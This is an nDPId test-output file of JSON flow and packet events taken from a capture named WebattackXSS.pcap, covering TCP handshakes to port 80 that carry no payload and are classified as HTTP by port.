-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":2,"flow_last_seen":1499347965133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347965133,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhvTIVjMH7ROfyKAScSANzgAAAgQFtAQCCAoD5od0ATy2AAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":3,"flow_last_seen":1499347965134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347965134,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KchAAD4GnBCsEAABwKgKMob0AFDtE5\/IyFYzCIAQAOWs1QAAAQEICgE8tgAD5od0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347966420,"flow_last_seen":1499347966420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347966420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1499347966420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347966420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U6hAAD4GciisEAABwKgKMocCAFDUQeTqAAAAAKACchBmBgAAAgQFtAQCCAoBPLdCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":2,"flow_last_seen":1499347966420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347966420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhwJV63ns1EHk66AScSAKcQAAAgQFtAQCCAoD5oi2ATy3QgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8285,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":3,"flow_last_seen":1499347966420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347966420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U6lAAD4Gci+sEAABwKgKMocCAFDUQeTrVet57YAQAOWpeAAAAQEICgE8t0ID5oi2"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347967724,"flow_last_seen":1499347967724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1499347967724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347967724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JnBAAD4Gn2CsEAABwKgKMocQAFDWSp74AAAAAKACchComwAAAgQFtAQCCAoBPLiIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":2,"flow_last_seen":1499347967725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347967725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhxDJR2HM1kqe+aAScSDwgwAAAgQFtAQCCAoD5on8ATy4iAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":3,"flow_last_seen":1499347967725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347967725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JnFAAD4Gn2esEAABwKgKMocQAFDWSp75yUdhzYAQAOWPiwAAAQEICgE8uIgD5on8"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347970267,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347970267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vvZAAD4GBtqsEAABwKgKMocqAFAxLQXyAAAAAKACchDkKQAAAgQFtAQCCAoBPLsEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8317,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":2,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347970267,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhyoPJF9xMS0F86AScSDmFAAAAgQFtAQCCAoD5ox4ATy7BAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":3,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vvdAAD4GBuGsEAABwKgKMocqAFAxLQXzDyRfcoAQAOWFHAAAAQEICgE8uwQD5ox4"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347971560,"flow_last_seen":1499347971560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347971560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1499347971560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347971560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XBJAAD4Gab6sEAABwKgKMoc4AFCpCuBVAAAAAKACchCQlwAAAgQFtAQCCAoBPLxHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":2,"flow_last_seen":1499347971560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347971560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhzgyg4heqQrgVqAScSBE8wAAAgQFtAQCCAoD5o27ATy8RwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":3,"flow_last_seen":1499347971561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347971561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XBNAAD4GacWsEAABwKgKMoc4AFCpCuBWMoOIX4AQAOXj+gAAAQEICgE8vEcD5o27"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347974113,"flow_last_seen":1499347974113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347974113,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1499347974113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347974113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rk1AAD4GF4OsEAABwKgKModSAFAISxCIAAAAAKACchD+jAAAAgQFtAQCCAoBPL7FAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":2,"flow_last_seen":1499347974113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347974113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh1LQi4qtCEsQiaAScSAQEwAAAgQFtAQCCAoD5pA5ATy+xQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":3,"flow_last_seen":1499347974113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347974113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rk5AAD4GF4qsEAABwKgKModSAFAISxCJ0IuKroAQAOWvGgAAAQEICgE8vsUD5pA5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8358,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347975371,"flow_last_seen":1499347975371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347975371,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8358,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1499347975371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347975371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l4BAAD4GLlCsEAABwKgKModgAFCggleAAAAAAKACchAeFAAAAgQFtAQCCAoBPMAAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8359,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":2,"flow_last_seen":1499347975371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347975371,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh2BVDgzaoIJXgaAScSAnsAAAAgQFtAQCCAoD5pF0ATzAAAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":3,"flow_last_seen":1499347975372,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347975372,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l4FAAD4GLlesEAABwKgKModgAFCggleBVQ4M24AQAOXGtwAAAQEICgE8wAAD5pF0"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347976658,"flow_last_seen":1499347976658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347976658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1499347976658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347976658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z4xAAD4GXkSsEAABwKgKModuAFDMdKbNAAAAAKACchChhQAAAgQFtAQCCAoBPMFBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":2,"flow_last_seen":1499347976658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347976658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh26qPdKAzHSmzqAScSCPCQAAAgQFtAQCCAoD5pK2ATzBQQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":3,"flow_last_seen":1499347976659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347976659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z41AAD4GXkusEAABwKgKModuAFDMdKbOqj3SgYAQAOUuEAAAAQEICgE8wUID5pK2"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 